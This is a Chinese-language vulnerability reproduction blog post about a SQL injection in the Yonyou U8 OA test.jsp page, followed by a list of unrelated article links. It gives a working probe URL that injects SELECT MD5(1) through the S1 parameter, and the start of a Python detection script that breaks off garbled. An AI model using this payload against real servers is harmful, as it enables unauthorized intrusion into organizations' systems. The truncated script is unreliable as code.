当前位置: 首页 > java >正文

用友OA U8 test.jsp sql注入漏洞复现

java 2025/7/1 22:40:23
警告:本文所涉及内容只可用于交流学习,请勿使用本文提到的内容违反法律,本文和作者不提供任何担保!!!

一、漏洞详情

用友U8 OA test.jsp存在SQL注入,主要是其s1参数未做过滤,导致sql注入,漏洞影响范围为“用友U8OA”。

用友u8OA界面如下

 二、漏洞复现

1、初步验证和探测

payload如下

ip:port/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

在url一栏测试一下,发现回显成功,判定存在sql注入

也可使用以下脚本探测

import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+输入目标url
http://www.xdnf.cn/news/11395.html

相关文章:

  • ARM嵌入式系统设计(Cortex-M3))一课一得之STM32开发板
  • java实现操作PDFlib库实例(附完整源码)
  • 黑客工具软件大全100套(非常详细)从零基础入门到精通,看完这一篇就够了
  • java四舍五入
  • 什么是scrum里的3355
  • PHP中 stripslashes() 函数 和 addslashes() 函数
  • 2024计算机最吃香的几大专业,哪些好就业?
  • 对于过滤器中使用getInputStream()、getParameter()接收参数接收不到的一些知识,以及解决方法。
  • TLSF算法概念,原理,内存碎片问题分析
  • UML 类关系(详解)——依赖、关联、聚合、组合、泛化
  • “IT小百科”之“电脑开机密码忘记了怎么办”
  • mentohust 使用
  • 打造优质的灵修生活
  • ActiveSync同步使用方法
  • OGG|Oracle GoldenGate 基础知识介绍(二)
  • 介绍一个很不错的电影网站
  • css实现两端对齐的3种方法
  • 机动战士高达观影顺序
  • 光耦合器知识概述
  • HTTP 和 HTTPS 的区别(面试常考题),计算机专业学生必备
  • 堆栈溢出
  • (译)追本溯源 —— C之精神
  • JAVA常用类—————StringTokenizer类
  • 重磅发布!吴恩达 AI 完整课程资源超级大汇总!
  • 微信web开发者工具
  • .wav文件详解,PCM数据格式,.wav生成C语言数组
  • Oracle数据库导入工具IMP详解与用法
  • java porm.xml_如何通过Maven仓库安装Spire系列的Java产品
  • java复习 02
  • 苹果CMS采集资源站